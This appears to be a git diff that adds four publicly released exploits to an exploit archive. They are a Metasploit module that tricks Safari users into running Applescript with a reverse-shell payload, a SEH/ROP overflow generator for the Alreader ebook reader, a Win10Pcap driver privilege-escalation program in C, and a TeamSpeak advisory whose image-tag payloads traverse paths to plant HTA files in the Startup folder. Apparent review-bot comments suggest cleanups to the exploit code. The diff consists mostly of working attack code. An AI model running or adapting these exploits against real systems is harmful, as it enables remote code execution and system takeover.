diff --git a/files.csv b/files.csv
index 0e2b8b28c..908d9c7ca 100755
--- a/files.csv
+++ b/files.csv
@@ -34791,6 +34791,7 @@ id,file,description,date,author,platform,type,port
38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting Vulnerability",2013-05-11,"Gjoko Krstic",php,webapps,0
38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
+38513,platforms/windows/remote/38513.txt,"TeamSpeak Client <= 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0
38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
@@ -34806,3 +34807,6 @@ id,file,description,date,author,platform,type,port
38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
+38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
+38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
+38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
diff --git a/platforms/osx/remote/38535.rb b/platforms/osx/remote/38535.rb
new file mode 100755
index 000000000..5324385c8
--- /dev/null
+++ b/platforms/osx/remote/38535.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Safari User-Assisted Applescript Exec Attack',
+ 'Description' => %q{
+ In versions of Mac OS X before 10.11.1, the applescript:// URL
+ scheme is provided, which opens the provided script in the Applescript
+ Editor. Pressing cmd-R in the Editor executes the code without any
+ additional confirmation from the user. By getting the user to press
+ cmd-R in Safari, and by hooking the cmd-key keypress event, a user
+ can be tricked into running arbitrary Applescript code.
+
+ Gatekeeper should be disabled from Security & Privacy in order to
+ avoid the unidentified Developer prompt.
+ },
+ 'License' => MSF_LICENSE,
+ 'Arch' => ARCH_CMD,
+ 'Platform' => ['unix', 'osx'],
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ },
+ 'Targets' =>
+ [
+ [ 'Mac OS X', {} ]
+ ],
+ 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Oct 16 2015',
+ 'Author' => [ 'joev' ],
+ 'References' =>
+ [
+ [ 'CVE', '2015-7007' ],
+ [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
+ ],
+ 'BrowserRequirements' => {
+ :source => 'script',
+ :ua_name => HttpClients::SAFARI,
+ :os_name => OperatingSystems::Match::MAC_OSX
+ }
+ ))
+
+ register_options([
+ OptString.new('CONTENT', [false, "Content to display in browser",
+ "This page has failed to load. Press cmd-R to refresh."]),
+ OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+ ], self.class)
+ end
+
+ def on_request_exploit(cli, request, profile)
+ print_status("Sending #{self.name}")
+ send_response_html(cli, exploit_html)
+ end
+
+ def exploit_html
+ "
#{content}"
+ end
+
+ def exploit_js
+ js_obfuscate %Q|
+ var as = Array(150).join("\\n") +
+ 'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
+ var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
+ window.onkeydown = function(e) {
+ if (e.keyCode == 91) {
+ window.location = url;
+ }
+ };
+ |
+ end
+
+ def sh
+ 'killall "Script Editor"; nohup ' + payload.encoded
+ end
+
+ def content
+ datastore['CONTENT']
+ end
+
+
+end
\ No newline at end of file
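Review bot: `WritableDir` is registered in `initialize` but nothing in the module reads `datastore['WritableDir']`, and `Msf::Exploit::EXE` is mixed in although none of its helpers are called; both look like template leftovers and should be removed or have their purpose documented. `exploit_js` is likewise never referenced in the hunk as rendered, but the string body of `exploit_html` appears to have lost its markup in extraction, so that one may be a page artifact rather than a source defect and is worth confirming against the actual file. If the mixin stays, a one-line comment such as `# EXE mixin kept for <reason>` above the `include` would spare the next reader the same question.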
diff --git a/platforms/windows/local/38532.py b/platforms/windows/local/38532.py
new file mode 100755
index 000000000..2c2f80a14
--- /dev/null
+++ b/platforms/windows/local/38532.py
@@ -0,0 +1,463 @@
+#!/usr/bin/env python
+
+#*************************************************************************************************************
+# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
+# Date: 25.10.2015
+# Category: Local Exploit
+# Exploit Author: g00dv1n
+# Contact: g00dv1n.private@gmail.com
+# Version: 2.5
+# Tested on: Windows XP SP3 / Windows 7 / Windows 8
+# Vendor Homepage: http://www.alreader.com/index.php?lang=en
+# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
+# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
+# CVE:
+
+
+
+# Description:
+# Alreader 2.5 its free FB2 reader for Windows.
+# FB2 format its just XML. FB2 contain block.
+# Overflow occurs if you create a long name of the author.
+# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
+# For example 41 41 - 00 41 00 41
+# So We should use UTF-16.
+#
+# Also, we can use single null byte in payload.
+#
+#
+#
+# Instructions:
+# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
+# 2. Run Alreader.exe
+# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
+# 4. Enjoy running Calc.exe
+#
+# Exploit owerview:
+# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
+# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
+# run Shellcode.
+#
+# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
+# ( It is necessary to adjust the offset in different systems .)
+# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
+# ( It is necessary to adjust the offset in different systems .)
+# Then the control get ROP chain .
+#
+# Program have Russian (RU) and English (Eng) versions.
+# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
+# For a combination of two versions into one exploit I place two ROP chains one after another.
+# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
+# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
+# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
+# With these tricks, the exploit works correctly for both versions.
+#
+# Below is ANSI-diagram of the payload:
+#
+# =-------------------------=
+# | gdvn | just fan magic bytes
+# |-------------------------|
+# | |
+# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
+# | | (ADD ESP, 808h RETN 4)
+# |-------------------------|
+# | |
+# | ROP NOP | x 500 Spray ROP NOP (RETN)
+# | |
+# |-------------------------|
+# | |
+# | ROP chain for |
+# | RU version |
+# | |
+# |-------------------------|
+# | SHELLCODE | Run Calc.exe
+# |-------------------------|
+# | |
+# | ROP NOP | x 250 Spray ROP NOP (RETN)
+# | |
+# |-------------------------|
+# | |
+# | ROP chain for |
+# | ENG version |
+# | |
+# |-------------------------|
+# | SHELLCODE | Run Calc.exe
+# |-------------------------|
+# | |
+# | ROP chain for |
+# | ENG version |
+# | |
+# |-------------------------|
+# | |
+# | |
+# | Junk | 'A' x 6000
+# | |
+# | |
+# =-------------------------=
+#
+#
+#
+#
+#
+#**************************************************************************************************************
+
+
+
+
+#######################################################################################################
+from struct import *
+
+#######################################################################################################
+file_result = "AlReader-fb2-PoC-exploit.fb2"
+
+
+########################################################################################################
+
+fuz_text = '' # init fuzzy string
+
+
+
+
+jmp_to = pack('
+
+
+
+
+
+ '''
+
+end = '''
+
+
+
+ EXPLOIT TEST
+
+
+
+'''
+start_u = start.encode('utf-16')
+
+end_u = end.encode('utf-16')
+
+fout = open(file_result, 'wb')
+fout.write(start_u)
+fout.close()
+
+fout = open(file_result,'ab')
+fout.write(fuz_text)
+fout.close()
+
+fout = open(file_result,'ab')
+fout.write(end_u)
+fout.close()
+
+
+print "[*] File successfully created !!\n\n"
\ No newline at end of file
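Review bot: The output file is opened and closed three times at the end of the script (`'wb'` then two `'ab'` reopens) to write three consecutive parts; a single `with` block writing `start_u`, `fuz_text` and `end_u` in order produces the same bytes and still closes the handle if a write raises. While there, `from struct import *` pulls the whole module into the namespace when only `pack` is used; `from struct import pack` makes the dependency explicit. Note that the hunk as rendered appears truncated between `jmp_to = pack('` and the closing `'''` of the template string, so the section between them could not be reviewed here.
```python
# … unchanged: header comments, file_result, fuz_text, start/end templates, encoding …
with open(file_result, 'wb') as fout:
    fout.write(start_u)
    fout.write(fuz_text)
    fout.write(end_u)
# … unchanged: final status print …
```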
diff --git a/platforms/windows/local/38533.c b/platforms/windows/local/38533.c
new file mode 100755
index 000000000..dc3cb2161
--- /dev/null
+++ b/platforms/windows/local/38533.c
@@ -0,0 +1,193 @@
+## Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+
+/* found with :
+!token
+1: kd> dt nt!_OBJECT_HEADER
+ +0x000 PointerCount : Int4B
+ +0x004 HandleCount : Int4B
+ +0x004 NextToFree : Ptr32 Void
+ +0x008 Lock : _EX_PUSH_LOCK
+ +0x00c TypeIndex : UChar
+ +0x00d TraceFlags : UChar
+ +0x00e InfoMask : UChar
+ +0x00f Flags : UChar
+ +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
+ +0x010 QuotaBlockCharged : Ptr32 Void
+ +0x014 SecurityDescriptor : Ptr32 Void
+ +0x018 Body : _QUAD
+
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN 0x5
+
+
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
+(SYSTEM_INFORMATION_CLASS)16;
+
+// The NtQuerySystemInformation function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+ IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+ OUT PVOID SystemInformation,
+ IN ULONG SystemInformationLength,
+ OUT PULONG ReturnLength OPTIONAL
+ );
+
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE
+{
+ ULONG ProcessId;
+ UCHAR ObjectTypeNumber;
+ UCHAR Flags;
+ USHORT Handle;
+ PVOID Object;
+ ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+ ULONG NumberOfHandles;
+ SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+
+
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation =
+(FILE_INFORMATION_CLASS)9;
+
+// The NtQueryInformationFile function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+ IN HANDLE FileHandle,
+ OUT PIO_STATUS_BLOCK IoStatusBlock,
+ OUT PVOID FileInformation,
+ IN ULONG Length,
+ IN FILE_INFORMATION_CLASS FileInformationClass
+ );
+
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+ ULONG FileNameLength;
+ WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+
+
+void* FindTokenAddressHandles(ULONG pid)
+{
+ /////////////////////////////////////////////////////////////////////////
+ // Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+ //
+
+ // The functions have no associated import library. You must use the
+ // LoadLibrary and GetProcAddress functions to dynamically link to
+ // ntdll.dll.
+
+ HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+ assert(hNtDll != NULL);
+
+ PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
+ (PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
+ "NtQuerySystemInformation");
+ assert(NtQuerySystemInformation != NULL);
+
+
+ /////////////////////////////////////////////////////////////////////////
+ // Get system handle information.
+ //
+
+ DWORD nSize = 4096, nReturn;
+ PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+ HeapAlloc(GetProcessHeap(), 0, nSize);
+
+ // NtQuerySystemInformation does not return the correct required buffer
+ // size if the buffer passed is too small. Instead you must call the
+ // function while increasing the buffer size until the function no longer
+ // returns STATUS_INFO_LENGTH_MISMATCH.
+ while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
+ nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+ {
+ HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+ nSize += 4096;
+ pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+ GetProcessHeap(), 0, nSize);
+ }
+
+ for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+ {
+
+ PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+
+ if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+ {
+ printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+ return pHandle->Object;
+ }
+ }
+
+ /////////////////////////////////////////////////////////////////////////
+ // Clean up.
+ //
+ HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+
+ return 0;
+}
+
+void main()
+{
+ DWORD dwBytesReturned;
+ DWORD ShellcodeFakeMemory;
+ HANDLE token;
+
+
+ // first create toke handle so find object address with handle
+ if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+ DebugBreak();
+
+ void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+
+ CloseHandle(token);
+
+ // i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
+ HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+ if(hDriver!=INVALID_HANDLE_VALUE)
+ {
+ fprintf(stderr," Open Driver OK\n");
+
+ if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+ {
+ fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+ return;
+ }
+ else fprintf(stderr," Send IOCTL OK\n");
+ }
+
+ else
+ {
+ fprintf(stderr," Open Driver error %d.\n",GetLastError());
+ return;
+ }
+
+
+ CloseHandle(hDriver);
+ getchar();
+
+}
\ No newline at end of file
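Review bot: `FindTokenAddressHandles` leaks the `HeapAlloc` buffer on its found path: the `return pHandle->Object;` inside the loop exits before the `HeapFree` that only the not-found path reaches. Copy the pointer out first, `void* found = pHandle->Object;` / `HeapFree(GetProcessHeap(), 0, pSysHandleInfo);` / `return found;`. The `HeapAlloc` results in the resize loop are also never checked for NULL before being handed back to `NtQuerySystemInformation`, and the initial allocation has the same gap. Separately, `void main()` is not a standard signature; `int main(void)` with explicit return codes would let the early `return`s in the driver-open and IOCTL branches be told apart from a normal run by whoever invokes the program.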
diff --git a/platforms/windows/remote/38513.txt b/platforms/windows/remote/38513.txt
new file mode 100755
index 000000000..496bca28a
--- /dev/null
+++ b/platforms/windows/remote/38513.txt
@@ -0,0 +1,132 @@
+Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
+Date: 12/10/2015
+Author: Scurippio / (0x6FB30B11 my pgp keyid)
+Vendor Homepage: https://www.teamspeak.com/
+Application: TeamSpeak 3
+Version: TeamSpeak3 Client 3.0.0 - 3.0.18.1
+Platforms: Windows, Mac OS X and Linux
+Exploitation: Remote
+Risk : Very High
+
+=========
+The Bug
+=========
+
+The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution.
+By changing the channel description you can insert a [img] bb tag with malicious content.
+
+There are a few problems with the image caching on disk.
+
+1: There is no check on file extension.
+
+2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc.
+
+ Example:
+
+ [img] http://yourevilhost.com/thefile.hta [/img]
+ [img] http://yourevilhost.com/thefile.msi [/img]
+ [img] http://yourevilhost.com/thefile.vbs [/img]
+ ...
+
+3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.
+
+ Example:
+
+ C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
+ C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
+ C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
+ ...
+
+4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
+This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.
+
+ Example:
+
+ [img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]
+
+If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!
+
+The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.
+
+==========================================
+Bypass / Vector / Payload
+==========================================
+To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.
+
+ Example:
+
+ RewriteEngine On
+ RewriteCond %{REQUEST_URI} !/faker.php
+ RewriteRule .* /faker.php
+
+Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.
+
+ Example:
+
+
+
+
+ PWN3D
+
+
+
+
+
+
+If you save the file in the windows startup directory you can achieve a remote code execution.
+
+ Example:
+
+ [img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
+ [img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
+
+The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
+At the next OS boot the victim will execute the malicious HTA file.
+
+=======
+Fix
+=======
+
+Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!
+
+======
+Info
+======
+
+10/20/2015 - I have reported this Vulnerability to Teamspeak developers team
+
+********* - Release the public exploit
+
+- Fuck the 'Captatori' - Tracciabili
+
+(Snappy is always with you :P )
+
+
+Copyright (c) 2015 Scurippio
+
+Permission is granted for the redistribution of this alert
+electronically. It may not be edited in any way without mine express
+written consent. If you wish to reprint the whole or any
+part of this alert in any other medium other than electronically,
+please email me for permission.
+
+Disclaimer: The information in the advisory is believed to be accurate
+at the time of publishing based on currently available information. Use
+of the information constitutes acceptance for use in an AS IS condition.
+There are no warranties with regard to this information. Neither the
+author nor the publisher accepts any liability for any direct, indirect,
+or consequential loss or damage arising from use of, or reliance on,
+this information.